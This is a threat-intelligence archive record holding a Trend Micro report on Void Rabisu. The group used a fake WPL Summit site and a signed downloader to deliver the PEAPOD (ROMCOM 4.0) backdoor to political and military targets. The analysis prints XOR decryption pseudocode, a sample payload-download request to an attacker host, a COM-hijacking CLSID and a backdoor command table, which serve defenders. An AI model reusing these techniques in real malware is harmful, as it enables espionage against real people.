{ "id": "ee678204-c40c-4adf-8a99-45b44a4730c6", "created_at": "2026-04-06T00:21:14.149978Z", "updated_at": "2026-04-10T03:28:28.138034Z", "deleted_at": null, "sha1_hash": "c1c7ef970ad7ca554dff52032de9da5e427ee4e7", "title": "Void Rabisu Targets Female Political Leaders with New Slimmed-Down ROMCOM Variant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2664329, "plain_text": "Void Rabisu Targets Female Political Leaders with New Slimmed-Down ROMCOM Variant\r\nBy By: Feike Hacquebord, Fernando Merces Oct 13, 2023 Read time: 9 min (2306 words)\r\nPublished: 2023-10-13 · Archived: 2026-04-05 18:32:19 UTC\r\nAPT \u0026 Targeted Attacks\r\nAlmost a year after Void Rabisu shifted its targeting from opportunistic ransomware attacks with an emphasis on\r\ncyberespionage, the threat actor is still developing its main malware, the ROMCOM backdoor.\r\nVoid Rabisu is an intrusion set associated with both financially motivated ransomware attacks and targeted\r\ncampaigns on Ukraine and countries supporting Ukraine. Among the threat actor’s previous targets were the\r\nUkrainian government and military, their energy and water utility sectors, EU politicians, spokespersons of a\r\ncertain EU government, and security conference participants. In campaigns conducted in late June and early\r\nAugust 2023, Void Rabisu targeted EU military personnel and political leaders working on gender equality\r\ninitiatives. Among the notable tools used by Void Rabisu is the ROMCOM backdoor, of which it seems to be the\r\nexclusive user. ROMCOM itself has gone through various developments over time, including the implementation\r\nof more effective detection evasion techniques.\r\nVoid Rabisu is one of the clearest examples where we see a mix of the typical tactics, techniques, and procedures\r\n(TTPs) used by cybercriminal threat actors and TTPs used by nation-state-sponsored threat actors motivated\r\nprimarily by espionage goals. For example, Void Rabisu has been signing malware with certificates most likely\r\nbought from a third-party service provider that other cybercriminal groups are also using. The threat actor has also\r\nemployed malicious advertisements on both Google and Bing to generate search engine traffic to their lure sites,\r\nwhich contain malicious copies of software often used by system administrators.\r\nVoid Rabisu also acts like an advanced persistent threat (APT) actor when it targets governments and military. In\r\nJune 2023, Void Rabisu exploited the vulnerability CVE-2023-36884 —  still a zero-day vulnerability then —  in\r\ncampaigns using the Ukrainian World Congress and the July 2023 NATO summit as lures. The extraordinary\r\ngeopolitical circumstances surrounding the war in Ukraine drives some of the financial-seeking threat actors\r\n(including Void Rabisu) toward campaigns motivated by espionage.\r\nAs reported by Microsoft, Void Rabisu used a zero-day vulnerability related to CVE-2023-36884 in attacks\r\ntargeting governments at the end of June 2023. Trend Micro’s telemetry further confirms that this campaign\r\ntargeted the military, government personnel, and politicians in Europe.\r\nThe payload spread by Void Rabisu during this period differed from the ROMCOM backdoor we analyzed in an\r\nearlier blog entry, but the two have clear similarities. This indicates that the threat actors are actively developing\r\nthe ROMCOM backdoor.\r\nhttps://www.trendmicro.com/en_us/research/23/j/void-rabisu-targets-female-leaders-with-new-romcom-variant.html\r\nPage 1 of 9\n\nThe next iteration of the malware was used in early August 2023. On or around Aug. 8, 2023, Void Rabisu set up a\r\nmalicious copy of the official website of the Women Political Leaders (WPL) Summit that was held in Brussels\r\nfrom June 7 to 8, 2023. The final payload was a new version of ROMCOM backdoor that we have dubbed as\r\n“ROMCOM 4.0” (also known as PEAPOD).\r\nAttended by people from all over the world, the WPL summit aims to improve gender equality in politics. Among\r\nthe topics included in the 2023 Brussels conference were peace and security, war and oppression, disinformation,\r\nthe war in Ukraine, the role of women in politics, and gender equality. Since many current and future political\r\nleaders had attended this conference, it presented an interesting target for espionage campaigns and served as a\r\npossible avenue for threat actors to gain an initial foothold in political organizations. It is therefore not surprising\r\nthat Void Rabisu set up a campaign targeting WPL Summit 2023 attendees. Our telemetry provided concrete\r\nevidence that this campaign was aimed at targets working on gender equality in EU politics.\r\nIn some of its latest campaigns, Void Rabisu started using a new technique that has not previously been reported\r\non. It involves a TLS-enforcing technique by the ROMCOM command-and-control (C\u0026C) servers that can render\r\nthe automated discovery of ROMCOM infrastructure more difficult. We observed Void Rabisu using this\r\ntechnique in a May 2023 ROMCOM campaign that spread a malicious copy of the legitimate PaperCut software,\r\nin which the C\u0026C server ignored requests that were not conformant.\r\nThis report provides a general background on Void Rabisu and its activities with regard to the recent WPL Summit\r\ncampaign. We begin by describing how Void Rabisu targeted WPL Summit attendees in the following section.\r\nThe fake WPL Summit 2023 page\r\nOn Aug. 8, 2023, Void Rabisu actors set up a website called wplsummit[.]com to attract visitors of the legitimate\r\nwplsummit.org domain. The fake website (shown in Figure 1) looked exactly like the legitimate one.\r\nhttps://www.trendmicro.com/en_us/research/23/j/void-rabisu-targets-female-leaders-with-new-romcom-variant.html\r\nPage 2 of 9\n\nFigure 1. WPL Summit 2023 fake website\r\nWhile the “Videos \u0026 photos” link of the legitimate domain redirects visitors to a Google Drive folder containing\r\nphotographs from the event, the wplsummit[.]com fake website directed visitors to a OneDrive folder containing\r\ntwo compressed files and an executable called Unpublished Pictures 1-20230802T122531-002-sfx.exe. The latter\r\nfile appears to be a piece of malware, the binary of which we analyze in the next section.\r\nopen on a new tab\r\nFigure 2. The OneDrive folder containing WPL Summit 2023 pictures and a malware downloader\r\nMalware analysis\r\nhttps://www.trendmicro.com/en_us/research/23/j/void-rabisu-targets-female-leaders-with-new-romcom-variant.html\r\nPage 3 of 9\n\nThe executable downloaded from the OneDrive folder is signed by a company called Elbor LLC (which was\r\npreviously used to sign multiple malicious files)  with a valid certificate. When executed, it pretends to be a self-extracting (SFX) archive and extracts 56 pictures from its resource section to a folder when the user selects the\r\n“Extract” button: \r\nopen on a new tab\r\nFigure 4. Pictures dropped by the malware downloader from the event (gathered by the threat actor\r\nfrom various social media postings)\r\nThe extracted photos were sourced by the malicious actor from individual posts on various social media platforms\r\nsuch as LinkedIn, X (formerly known as Twitter), and Instagram. While the victim is distracted with the pictures,\r\nthe malware sends an HTTP GET request to https://mctelemetryzone[.]com/favicon.ico. The HTTP User-Agent\r\nstring is checked on the server side, and if it matches the following string, a 122-KB file is downloaded:+\r\n“Mozilla/5.0 (Windows NT 10.0; Win64; x64; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/114.0.0.0 Safari/537.36 Edge/44.18363.8131”\r\n The file is an XOR-encrypted PE file:\r\nThe downloaded file can be decrypted with the following pseudocode:\r\nfor (i=0; i\u003clen; i++)\r\n                data[i] = data[i] ^ 0xf0 * i\r\nhttps://www.trendmicro.com/en_us/research/23/j/void-rabisu-targets-female-leaders-with-new-romcom-variant.html\r\nPage 4 of 9\n\nThe decrypted file is a 64-bit DLL that exports a CPLInit() function. The first stage downloader then loads this\r\nDLL to memory and calls this function. It’s important to highlight that this DLL never touches the disk. In other\r\nwords, its download, decryption, and execution routines all happen in runtime in memory.\r\nPayload setup\r\nThe DLL that runs from memory is internally called trymenow.dll. It reaches out to the legitimate online service\r\nworldtimeapi.org to obtain a unique timestamp for the current date and time in Unix Epoch format. This is later\r\nused to seed a calculation algorithm that generates the URL path for the next request.\r\nThe path matches the regular expression [12]/[0-9]{9}, where the first part before the slash represents what\r\ncomponent the downloader is requesting. The next part after the slash is possibly an identifier, as it is consistent\r\nbetween requests. The URL is encoded using the Base64 format before the request is sent to redditanalytics[.]\r\npm in order to download the third stage component. The following is a sample request:\r\nGET https://redditanalytics.pm/Mi8xMzI0NTY3ODk=\r\nAccept:           */*\r\nUA-CPU:           AMD64\r\nAccept-Encoding:  gzip, deflate\r\nUser-Agent:       Mozilla/5.0 (iPhone; CPU iPhone OS 16_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML,\r\nlike Gecko) Version/16.0 EdgiOS/114.1823.67 Mobile/15E148 Safari/605.1.15\r\nHost:             redditanalytics.pm\r\nConnection:       Keep-Alive\r\nOn the server side, the URL path is decoded. If everything is correct, the server replies with another XOR-encrypted file that will be decrypted and stored at %PUBLIC%\\AccountPictures\\Defender\\Security.dll, which is\r\nthe DLL used for COM hijacking. This time, Void Rabisu chose to hijack CLSID {F5078F32-C551-11D3-89B9-\r\n0000F81FE221}, which is used by the WordPad application\r\nThe next step involves reaching out to worldtimeapi.org again to get an updated timestamp and download another\r\ncomponent from redditanalytics[.]pm, which is the component that talks to the C\u0026C server\r\nnetstaticsinformation[.]com. (This is the network component from our previous blog entry.)\r\nAfter both payloads are downloaded, WordPad is launched, causing the first payload to execute via COM\r\nhijacking.\r\nC\u0026C server communication\r\nThe PEAPOD samples we analyzed force WinHTTP functions to use TLS 1.2 instead of the default version\r\nchosen by the operating system. A C\u0026C server for a previous campaign using the legitimate PaperCut software as\r\na lure checked the TLS version of a client HTTP request and would not respond with a payload if the request was\r\nnot conformant. However, the C\u0026C server for the campaign targeting WPL Summit 2023 attendees responded as\r\nexpected, regardless of the TLS version negotiation used to initiate the communication.\r\nhttps://www.trendmicro.com/en_us/research/23/j/void-rabisu-targets-female-leaders-with-new-romcom-variant.html\r\nPage 5 of 9\n\nThe malware first prepares the right flag for later use with WinHttpSetOption(). Afterward, it creates an HTTP\r\nsession using Microsoft Edge 1.0 as the User-Agent string. However, before anything is sent to the server, the\r\nconnection is set to use TLS 1.2.\r\nWe checked how different Windows versions treat SSL/TLS usage, which we summarize in the following table:\r\nOperating System WinHTTP flag TLS version used\r\nWindows 11 WINHTTP_FLAG_SECURE_PROTOCOL_TLS1_2 1.2\r\nWindows 11 (not set / default) 1.3\r\nWindows 10 WINHTTP_FLAG_SECURE_PROTOCOL_TLS1_2 1.2\r\nWindows 10 (not set / default) 1.2\r\nWindows 7 WINHTTP_FLAG_SECURE_PROTOCOL_TLS1_2 An error occurs\r\nWindows 7 (not set / default) 1\r\nTable 1. A summary of how Windows versions treat SSL/TLS usage\r\nBased on the table, we believe that PEAPOD cannot infect systems running Windows 7 and earlier versions. Why\r\nVoid Rabisu uses this flag is still an open question, but it is possible that it wanted to implement some form of\r\nchecking on the C\u0026C server side to make C\u0026C fingerprinting harder.\r\nBefore sending the POST request by calling WinHttpSendRequest(), additional flags are set to ignore all certificate\r\nerrors. An empty request is sent, followed by a request containing a command to let the C\u0026C server know about\r\nthe victim.\r\nopen on a new tab\r\nhttps://www.trendmicro.com/en_us/research/23/j/void-rabisu-targets-female-leaders-with-new-romcom-variant.html\r\nPage 6 of 9\n\nFigure 6. Additional flags are set to ignore all certificate errors\r\nIf the malware cannot reach out to the C\u0026C server using HTTPS, it tries to connect via raw TCP (Transmission\r\nControl Protocol) at port 442 or ICMP (Internet Control Message Protocol).\r\nComparing ROMCOM 3.0 and PEAPOD\r\nThanks to Volexity researchersopen on a new tab who shared a previous PEAPOD sample with us, we were able\r\nto confirm that Void Rabisu seems to have temporarily stopped using ROMCOM 3.0 and have begun delivering\r\nPEAPOD, which has some architectural differences compared to ROMCOM 3.0. We highlight these differences in\r\nthe following table:\r\nCapability ROMCOM 3.0 PEAPOD\r\nDropper\r\nModified installation program\r\n(MSI or EXE) that drops the\r\nother components\r\nEXE downloads XOR-encrypted DLL, which\r\ndownloads the other components\r\nCore malware\r\nmodularity\r\nThree components: COM\r\nhijacking (loader), worker,\r\nand network\r\nThree components observed: COM hijacking\r\n(loader), worker (stored in Windows Registry)\r\nand network. Most of them loaded from\r\nmemory.\r\nComponents Inter-process communication\r\n(IPC)\r\nLocalhost sockets Named pipes\r\nCommands\r\n42 commands handled by the\r\nworker component\r\n10 commands in total. The network component\r\nhandles 7 of them directly and forwards the\r\nother 3 to the worker component. \r\nTable 2. Key differences between ROMCOM 3.0 and PEAPOD\r\nWe summarize the commands supported by PEAPOD in the following table:\r\nCommand Description Details\r\n0 No action\r\nThe function that handles the commands will return zero\r\nand the malware will wait for the next command\r\n1 Run command Executes a command and sends back its output\r\n2 Uploads file Uploads a file to the infected machine\r\n3 Downloads file Downloads a file from the infected machine\r\n4 Run command Executes a command\r\nhttps://www.trendmicro.com/en_us/research/23/j/void-rabisu-targets-female-leaders-with-new-romcom-variant.html\r\nPage 7 of 9\n\n5\r\nUpdates the interval the backdoor\r\nand checks for new activity\r\n(default to 60 seconds)\r\nThe new interval received is sent to security.dll via the\r\nnamed pipe and security.dll then writes it to registry\r\n6 Gets system info Retrieves RAM, processor info, local time, and username\r\n7 Updates the network component\r\nThe data for the new version of the network component is\r\nwritten to a named pipe, which is read by the loader\r\n(security.dll) and updated in the Windows registry\r\n8  Uninstalls PEAPOD Registry keys are cleaned, and all files are deleted\r\n9 Gets the service name Returns the service DisplayName from registry\r\nTable 3. Commands supported by PEAPOD\r\nBy using the commands listed in Table 3, it is still possible for systems infected by PEAPOD to download a third\r\ncomponent that is more like the ROMCOM 3.0 worker, which would allow the threat actors to have the same level\r\nof control over the victims that they targeted with ROMCOM 3.0. However, machines we infected in our lab did\r\nnot download any additional components.\r\nConclusions and outlook\r\nAlmost a year after Void Rabisu shifted its targeting from opportunistic ransomware attacks with an emphasis on\r\ncyberespionage, the threat actor is still developing its main malware, the ROMCOM backdoor. The backdoor\r\nbeing stripped down to its core, with additional components being downloaded as needed, provides Void Rabisu\r\nthe choice of loading additional components for specific targets. From the attacker’s perspective, this has the\r\nadvantage of less exposure for the additional components, making it more difficult to collect for malware\r\nresearchers.\r\nSome of Void Rabisu’s campaigns very narrowly target politicians, government employees, and the military. This\r\nmeans that Void Rabisu has branched out into an area that is usually covered by APT groups typically thought to\r\nbe nation-state-sponsored.\r\nWhile we have no evidence that Void Rabisu is nation-state-sponsored, it’s possible that it is one of the financially\r\nmotivated threat actors from the criminal underground that got pulled into cyberespionage activities due to the\r\nextraordinary geopolitical circumstances caused by the war in Ukraine.  \r\nVoid Rabisu has targeted participants of at least three conferences in 2023, namely the Munich Security\r\nConference, the Masters of Digital conference, and the WPL Summit. It is possible, and even expected, that other\r\nconferences and special interest groups will be targeted by Void Rabisu in the future. We will keep paying close\r\nattention to Void Rabisu’s TTPs and report on new campaigns as we find them.\r\nIndicators of Compromise (IOCs)\r\nThe indicators of compromise for this entry can be found in this link.\r\nhttps://www.trendmicro.com/en_us/research/23/j/void-rabisu-targets-female-leaders-with-new-romcom-variant.html\r\nPage 8 of 9\n\nWith additional contribution from Lord Remorin\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/23/j/void-rabisu-targets-female-leaders-with-new-romcom-variant.html\r\nhttps://www.trendmicro.com/en_us/research/23/j/void-rabisu-targets-female-leaders-with-new-romcom-variant.html\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "ETDA", "Malpedia" ], "references": [ "https://www.trendmicro.com/en_us/research/23/j/void-rabisu-targets-female-leaders-with-new-romcom-variant.html" ], "report_names": [ "void-rabisu-targets-female-leaders-with-new-romcom-variant.html" ], "threat_actors": [ { "id": "fecc0d5a-3654-425d-9290-b6d0b4105463", "created_at": "2023-10-17T02:00:08.330061Z", "updated_at": "2026-04-10T02:00:03.37711Z", "deleted_at": null, "main_name": "Void Rabisu", "aliases": [ "Tropical Scorpius" ], "source_name": "MISPGALAXY:Void Rabisu", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "555e2cac-931d-4ad4-8eaa-64df6451059d", "created_at": "2023-01-06T13:46:39.48103Z", "updated_at": "2026-04-10T02:00:03.342729Z", "deleted_at": null, "main_name": "RomCom", "aliases": [ "UAT-5647", "Storm-0978" ], "source_name": "MISPGALAXY:RomCom", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d58052ba-978b-4775-985a-26ed8e64f98c", "created_at": "2023-09-07T02:02:48.069895Z", "updated_at": "2026-04-10T02:00:04.946879Z", "deleted_at": null, "main_name": "Tropical Scorpius", "aliases": [ "DEV-0978", "RomCom", "Storm-0671", "Storm-0978", "TA829", "Tropical Scorpius", "UAC-0180", "UNC2596", "Void Rabisu" ], "source_name": "ETDA:Tropical Scorpius", "tools": [ "COLDDRAW", "Cuba", "Industrial Spy", "PEAPOD", "ROMCOM", "ROMCOM RAT", "SingleCamper", "SnipBot" ], "source_id": "ETDA", "reports": null }, { "id": "4f56bb34-098d-43f6-a0e8-99616116c3ea", "created_at": "2024-06-19T02:03:08.048835Z", "updated_at": "2026-04-10T02:00:03.870819Z", "deleted_at": null, "main_name": "GOLD FLAMINGO", "aliases": [ "REF9019 ", "Tropical Scorpius ", "UAC-0132 ", "UAC0132 ", "UNC2596 ", "Void Rabisu " ], "source_name": "Secureworks:GOLD FLAMINGO", "tools": [ "Chanitor", "Cobalt Strike", "Cuba", "Meterpreter", "Mimikatz", "ROMCOM RAT" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434874, "ts_updated_at": 1775791708, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c1c7ef970ad7ca554dff52032de9da5e427ee4e7.pdf", "text": "https://archive.orkl.eu/c1c7ef970ad7ca554dff52032de9da5e427ee4e7.txt", "img": "https://archive.orkl.eu/c1c7ef970ad7ca554dff52032de9da5e427ee4e7.jpg" } }